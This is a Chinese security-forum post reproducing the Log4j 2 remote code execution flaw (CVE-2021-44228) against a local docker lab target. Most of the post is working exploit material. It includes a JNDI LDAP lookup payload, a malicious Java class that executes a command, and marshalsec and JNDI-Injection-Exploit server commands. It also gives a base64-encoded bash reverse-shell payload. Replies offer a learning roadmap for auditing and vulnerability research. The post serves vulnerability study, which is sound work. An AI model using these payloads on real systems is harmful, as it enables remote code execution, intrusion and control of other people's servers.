吾爱破解 - 52pojie.cn

 找回密码
 注册[Register]

QQ登录

只需一步,快速开始

查看: 4306|回复: 8
收起左侧

[漏洞分析] CVE-2021-44228 Apache Log4j 2 远程代码执行漏洞

  [复制链接]
Edith123 发表于 2022-1-22 18:15

影响范围


Apache Log4j 2.x < 2.15.0-rc2
本地复现https://github.com/tangxiaofeng7/apache-log4j-poclog4j.java内容
[Java] 纯文本查看 复制代码
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
 
 
public class log4j {
    private static final Logger logger = LogManager.getLogger(log4j.class);
 
    public static void main(String[] args) {
        System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
        logger.error("${jndi:ldap://127.0.0.1:1389/Log4jRCE}");
 
    }
}
Log4jRCE.java
[Java] 纯文本查看 复制代码
public class Log4jRCE {
    static {
        try {
            String [] cmd={"calc"};
            java.lang.Runtime.getRuntime().exec(cmd).waitFor();
        }catch (Exception e){
            e.printStackTrace();
        }
    }
 
}
注意,这里Log4jRCE.java不要放在项目里,我这里将Log4jRCE.class放到了D盘根目录,不然log4j.java运行时会读取到本地的Log4jRCE,就不是http远程下载了在D盘根目录
[Asm] 纯文本查看 复制代码
python -m http.server 8888
然后执行
[Asm] 纯文本查看 复制代码
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Log4jRCE"
image.png image.png
远程RCE
docker拉个镜像
[Asm] 纯文本查看 复制代码
docker pull vulfocus/log4j2-rce-2021-12-09:latest
docker run -d -p 8080:8080 vulfocus/log4j2-rce-2021-12-09:latest
先用网上公开的exp探测一下(此处为了引起不要的麻烦打码,你懂的) image.png image.png
反弹shell
需要用到JNDI-Injection-Exploit启动&#12032;个rmi和ldap服务器,15c1貌似给ldap禁了但是rmi可以用,所以有了15c2
[Asm] 纯文本查看 复制代码
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,xxxxxxxxxxxxxxxxxxuNzYuNDkvODQ0NCAwPiYx}|{base64,-d}|{bash,-i}" -A 127.0.0.1

burp发包即可 image.png image.png image.png


漏洞检测工具
推荐长亭科技免费推出的工具https://log4j2-detector.chaitin.cn
image.png image.png image.png image.png

免费评分

参与人数 5吾爱币 +6 热心值 +5 收起 理由
jacyyang + 1 我很赞同!
Nattevak + 3 + 1 我很赞同!
sunlei658 + 1 + 1 谢谢@Thanks!
aa530416 + 1 + 1 热心回复!
monk3435 + 1 + 1 我很赞同!

查看全部评分

发帖前要善用论坛搜索功能,那里可能会有你要找的答案或者已经有人发布过相同内容了,请勿重复发帖。

 楼主| Edith123 发表于 2022-1-25 22:58
本帖最后由 Edith123 于 2022-1-25 23:18 编辑
youyouhuaqiao 发表于 2022-1-24 16:33
如何学习漏洞发掘和复现能力?

本菜鸡做Web安全的
转一个大佬的路线:
(1)先把java基础学—下重点file类型类的各种机制比如继承多态等。
(2)了解一下中间件如tomcat,spring,springboot等环境搭建以及开发的基础知识
(3)了解一些基础漏洞的代码xss注入文件上传等
我的审计路线是
(1)先把java基础学—下重点file类型类的各种机制比如继承多态等。ag22 8182(2)了解一下中间件如tomcat,spring,springboot等环境搭建以及开发的基础知识(3)了解一些基础漏洞的代码xss注入文件上传等
(4)审计一些老的cms不涉及mvc的,主要是可以熟悉漏洞,一般13 14 15年的比较多
(5)能审计不涉及mvc的之后,了解一下mvc,审计mvc的cms ,主要还是练手
(6)普通漏洞能审计之后开始复现分析一些框架漏洞组件漏洞然后深入看看反序列化漏洞
(7)了解框架的实现原理,主要是各个部分至少知道一个大概
(8)内存马回显这一块多看看会
(9)学一点java稍微深入一点的jvm等等。
(7)了解框架的实现原理,主要是各个部分至少知道一个大概
(8)内存马回显这一块多看看会
(9)学一点java稍微深入一点的jvm等等。

每个人学习方法不一样,主要是静下心来亲自动手
isPasser 发表于 2022-1-24 17:52
jxji 发表于 2022-1-24 17:53
JNDI-Injection-Exploit 自己也有反序列化漏洞,有可能被反打
casey502 发表于 2022-1-25 14:54
可以,但是如果能控制端口应该更好
Hao轩 发表于 2022-1-25 15:16
学习到新姿势了!!
 楼主| Edith123 发表于 2022-1-25 22:59
jxji 发表于 2022-1-24 17:53
JNDI-Injection-Exploit 自己也有反序列化漏洞,有可能被反打

哈哈哈哈
 楼主| Edith123 发表于 2022-1-25 23:14
isPasser 发表于 2022-1-24 17:52
这个让多少开发加班

安全也要加班,2021史诗级漏洞
您需要登录后才可以回帖 登录 | 注册[Register]

本版积分规则

返回列表

RSS订阅|小黑屋|处罚记录|联系我们|吾爱破解 - LCG - LSG ( 京ICP备16042023号 | 京公网安备 11010502030087号 )

GMT+8, 2024-12-22 01:15

Powered by Discuz!

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表